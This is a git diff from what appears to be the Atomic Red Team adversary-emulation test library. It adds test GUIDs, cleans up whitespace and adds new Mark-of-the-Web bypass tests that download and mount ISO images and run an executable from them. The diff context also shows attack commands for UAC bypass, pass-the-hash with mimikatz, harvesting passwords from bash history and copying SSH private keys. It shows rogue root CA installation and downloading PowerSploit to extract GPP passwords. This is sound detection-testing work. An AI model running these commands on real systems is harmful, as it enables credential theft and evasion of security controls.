 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -147,10 +159,14 @@ Upon execution command prompt will be opened.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3f627297-6c38-4e7d-a278-fc2563eaaeaa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -184,10 +200,14 @@ Upon execution administrative command prompt should open
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3c51abf2-44bf-42d8-9111-dc96ff66750f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -221,10 +241,14 @@ Upon execution the directory structure should exist if the system is patched, if
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f7a35090-6f7f-4f64-bb47-d657bf5b10c1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable_binary | Binary to execute with UAC Bypass | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
 
@@ -260,10 +284,14 @@ Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3be891eb-4608-4173-87e8-78b494c029b7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command.to.execute | Command to execute | string | cmd.exe /c notepad.exe|
 
@@ -297,6 +325,10 @@ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
+
+
+
 
 
 
@@ -335,10 +367,14 @@ REM will tell it to ignore everything after %windir% and treat it just as a NOTE
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 28104f8a-4ff1-4582-bcf6-699dce156608
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the bat file | String | PathToAtomicsFolder&#92;T1548.002&#92;src&#92;T1548.002.bat|
 
diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md
index dc2d0842..7e3aeca4 100644
--- a/atomics/T1548.003/T1548.003.md
+++ b/atomics/T1548.003/T1548.003.md
@@ -27,6 +27,10 @@ Common Sudo enumeration methods.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
+
+
+
 
 
 
@@ -53,6 +57,10 @@ Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** a7b17659-dd5e-46f7-b7d1-e6792c91d0bc
+
+
+
 
 
 
@@ -78,6 +86,10 @@ Sets sudo caching tty_tickets value to disabled. This is dangerous to modify wit
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 91a60b03-fb75-4d24-a42e-2eb8956e8de1
+
+
+
 
 
 
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md
index 3b5dc5f3..d0fc6f04 100644
--- a/atomics/T1550.002/T1550.002.md
+++ b/atomics/T1550.002/T1550.002.md
@@ -22,10 +22,14 @@ Note: must dump hashes first
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ec23cef9-27d9-46e4-a68d-6f75f7b86908
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username | string | Administrator|
 | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
@@ -48,7 +52,7 @@ Note: must dump hashes first
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -71,10 +75,14 @@ command execute with crackmapexec
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** eb05b028-16c8-4ad8-adea-6f5b219da9a9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username | string | Administrator|
 | crackmapexec_exe | crackmapexec windows executable | Path | C:&#92;CrackMapExecWin&#92;crackmapexec.exe|
@@ -97,7 +105,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
 ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } 
+if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md
index 8c4fc94d..b7dff150 100644
--- a/atomics/T1550.003/T1550.003.md
+++ b/atomics/T1550.003/T1550.003.md
@@ -23,10 +23,14 @@ Similar to PTH, but attacking Kerberos
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dbf38128-7ba7-4776-bedf-cc2eed432098
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username | string | Administrator|
 | domain | domain | string | atomic.local|
@@ -47,7 +51,7 @@ Similar to PTH, but attacking Kerberos
 ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md
index 33589071..6761c411 100644
--- a/atomics/T1552.001/T1552.001.md
+++ b/atomics/T1552.001/T1552.001.md
@@ -27,6 +27,10 @@ In cloud and/or containerized environments, authenticated user and service accou
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
+
+
+
 
 
 
@@ -51,10 +55,14 @@ Extracting credentials from files
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to search | String | /|
 
@@ -80,6 +88,10 @@ Extracting Credentials from Files. Upon execution, the contents of files that co
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0e56bf29-ff49-4ea5-9af4-3b81283fd513
+
+
+
 
 
 
@@ -106,6 +118,10 @@ If these files exist, their contents will be displayed. They are used to store c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 367d4004-5fc0-446d-823f-960c74ae52c3
+
+
+
 
 
 
@@ -131,6 +147,10 @@ This test looks for .netrc files (which stores github credentials in clear text
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803
+
+
+
 
 
 
diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md
index ceefc502..a4fb96e6 100644
--- a/atomics/T1552.002/T1552.002.md
+++ b/atomics/T1552.002/T1552.002.md
@@ -22,6 +22,10 @@ Queries to enumerate for credentials in the Registry. Upon execution, any regist
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b6ec082c-7384-46b3-a111-9a9b8b14e5e7
+
+
+
 
 
 
@@ -48,6 +52,10 @@ entries are found, they will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** af197fd7-e868-448e-9bd5-05d1bcd9d9e5
+
+
+
 
 
 
diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md
index 61a5049e..ff2377b5 100644
--- a/atomics/T1552.003/T1552.003.md
+++ b/atomics/T1552.003/T1552.003.md
@@ -15,10 +15,14 @@ Search through bash history for specifice commands we want to capture
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | ~/loot.txt|
 | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index d9eb8d26..8780b653 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -28,6 +28,10 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696
+
+
+
 
 
 
@@ -52,10 +56,14 @@ Discover private SSH keys on a macOS or Linux system.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | search_path | Path where to start searching from. | path | /|
 | output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
@@ -87,10 +95,14 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | search_path | Path where to start searching from. | path | /|
 | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
@@ -123,10 +135,14 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the `
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | search_path | Path where to start searching from. | path | /|
 | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md
index 1fea602a..718e21a9 100644
--- a/atomics/T1552.006/T1552.006.md
+++ b/atomics/T1552.006/T1552.006.md
@@ -28,6 +28,10 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f
+
+
+
 
 
 
@@ -45,7 +49,7 @@ findstr /S cpassword %logonserver%\sysvol\*.xml
 ##### Description: Computer must be domain joined
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -68,10 +72,14 @@ Successful test execution will either display the credentials found in the GPP f
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gpp_script_url | URL of the Get-GPPPassword PowerShell Script | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1|
 | gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder&#92;T1552.006&#92;src&#92;Get-GPPPassword.ps1|
@@ -92,7 +100,7 @@ Get-GPPPassword -Verbose
 ##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
 ##### Check Prereq Commands:
 ```powershell
-if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } 
+if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -102,7 +110,7 @@ Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
 ##### Description: Computer must be domain joined
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md
index 150c669b..9bcf155c 100644
--- a/atomics/T1552.007/T1552.007.md
+++ b/atomics/T1552.007/T1552.007.md
@@ -19,10 +19,14 @@ A Kubernetes secret is an object that lets users store and manage sensitive info
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | namespace | K8s namespace to list | String | default|
 
@@ -48,6 +52,10 @@ Access the Kubernetes service account access token stored within a container in
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f
+
+
+
 
 
 
@@ -69,7 +77,7 @@ kubectl --context kind-atomic-cluster delete pod atomic-pod
 ##### Description: Verify docker is installed.
 ##### Check Prereq Commands:
 ```sh
-which docker 
+which docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -78,7 +86,7 @@ if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt
 ##### Description: Verify docker service is running.
 ##### Check Prereq Commands:
 ```sh
-sudo systemctl status docker 
+sudo systemctl status docker
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -87,7 +95,7 @@ sudo systemctl start docker
 ##### Description: Verify kind is in the path.
 ##### Check Prereq Commands:
 ```sh
-which kind 
+which kind
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -98,7 +106,7 @@ mv kind /usr/bin/kind
 ##### Description: Verify kind-atomic-cluster is created
 ##### Check Prereq Commands:
 ```sh
-sudo kind get clusters 
+sudo kind get clusters
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -107,7 +115,7 @@ sudo kind create cluster --name atomic-cluster
 ##### Description: Verify kubectl is in path
 ##### Check Prereq Commands:
 ```sh
-which kubectl 
+which kubectl
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -118,7 +126,7 @@ mv kubectl /usr/bin/kubectl
 ##### Description: Verify atomic-pod is running.
 ##### Check Prereq Commands:
 ```sh
-kubectl --context kind-atomic-cluster get pods |grep atomic-pod 
+kubectl --context kind-atomic-cluster get pods |grep atomic-pod
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md
index 93bc43cf..82a30cb0 100644
--- a/atomics/T1553.001/T1553.001.md
+++ b/atomics/T1553.001/T1553.001.md
@@ -19,10 +19,14 @@ Gatekeeper Bypass via command line
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | app_path | Path to app to be used | Path | myapp.app|
 
diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md
index c17ef4a6..c1386bca 100644
--- a/atomics/T1553.004/T1553.004.md
+++ b/atomics/T1553.004/T1553.004.md
@@ -31,10 +31,14 @@ Creates a root CA with openssl
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
 | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -70,10 +74,14 @@ Creates a root CA with openssl
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cert_filename | CA file name | Path | rootCA.crt|
 | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -94,7 +102,7 @@ echo sudo update-ca-certificates
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
 ```sh
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -114,10 +122,14 @@ Creates a root CA with openssl
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cert_filename | CA file name | Path | rootCA.crt|
 | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
@@ -137,7 +149,7 @@ sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.key
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
 ```sh
-if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; 
+if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -157,10 +169,14 @@ Creates a root CA with Powershell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | pfx_path | Path of the certificate | Path | rootCA.cer|
 
@@ -191,7 +207,7 @@ catch {
 ##### Description: Verify the certificate exists. It generates if not on disk.
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } 
+if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -212,10 +228,14 @@ Creates a root CA with certutil
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | pfx_path | Path of the certificate | Path | $env:Temp&#92;rootCA2.cer|
 
@@ -240,7 +260,7 @@ Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore |
 ##### Description: Certificate must exist at specified location (#{pfx_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } 
+if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md
new file mode 100644
index 00000000..805a501a
--- /dev/null
+++ b/atomics/T1553.005/T1553.005.md
@@ -0,0 +1,118 @@
+# T1553.005 - Mark-of-the-Web Bypass
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1553/005)
+<blockquote>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named <code>Zone.Identifier</code> with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
+
+Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image)
+
+- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso)
+
+
+<br/>
+
+## Atomic Test #1 - Mount ISO image
+Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder&#92;T1553.005&#92;bin&#92;T1553.005.iso|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Mount-DiskImage -ImagePath "#{path_of_iso}"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Mount an ISO image and run executable from the ISO
+Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
+Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
+ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_of_iso | Path to ISO file | path | PathToAtomicsFolder&#92;T1553.005&#92;bin&#92;FeelTheBurn.iso|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+$driveLetter = ($keep | Get-Volume).DriveLetter
+invoke-item "$($driveLetter):\hello.exe"
+```
+
+#### Cleanup Commands:
+```powershell
+Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+Stop-process -name "hello" -Force -ErrorAction ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
new file mode 100644
index 00000000..e31b4c2a
--- /dev/null
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -0,0 +1,61 @@
+attack_technique: T1553.005
+display_name: 'Subvert Trust Controls: Mark-of-the-Web Bypass'
+atomic_tests:
+- name: Mount ISO image
+  auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+  description: |
+    Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+  supported_platforms:
+  - windows
+  input_arguments:
+    path_of_iso:
+      description: Path to ISO file
+      type: path
+      default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+    prereq_command: |
+      if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+  executor:
+    command: |
+      Mount-DiskImage -ImagePath "#{path_of_iso}"
+    cleanup_command: |
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+    name: powershell
+
+- name: Mount an ISO image and run executable from the ISO
+  auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+  description: |-
+    Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
+    Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
+    ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,  
+  supported_platforms:
+  - windows
+  input_arguments:
+    path_of_iso:
+      description: Path to ISO file
+      type: path
+      default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+    prereq_command: |
+      if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+  executor:
+    command: |
+      $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+      $driveLetter = ($keep | Get-Volume).DriveLetter
+      invoke-item "$($driveLetter):\hello.exe"
+    cleanup_command: |
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+      Stop-process -name "hello" -Force -ErrorAction ignore
+    name: powershell
\ No newline at end of file
diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso
new file mode 100644
index 00000000..491da79f
Binary files /dev/null and b/atomics/T1553.005/bin/FeelTheBurn.iso differ
diff --git a/atomics/T1553.005/bin/T1553.005.iso b/atomics/T1553.005/bin/T1553.005.iso
new file mode 100644
index 00000000..5f01ec95
Binary files /dev/null and b/atomics/T1553.005/bin/T1553.005.iso differ
diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md
index 4639ef46..76b62aaf 100644
--- a/atomics/T1555.001/T1555.001.md
+++ b/atomics/T1555.001/T1555.001.md
@@ -27,10 +27,14 @@ To manage their credentials, users have to use additional credentials to access
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cert_export | Specify the path of the certificates to export. | path | /tmp/certs.pem|
 
diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md
index c246dec0..d780ed3d 100644
--- a/atomics/T1555.003/T1555.003.md
+++ b/atomics/T1555.003/T1555.003.md
@@ -31,10 +31,14 @@ Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path for modified Sysinternals | String | $env:TEMP|
 
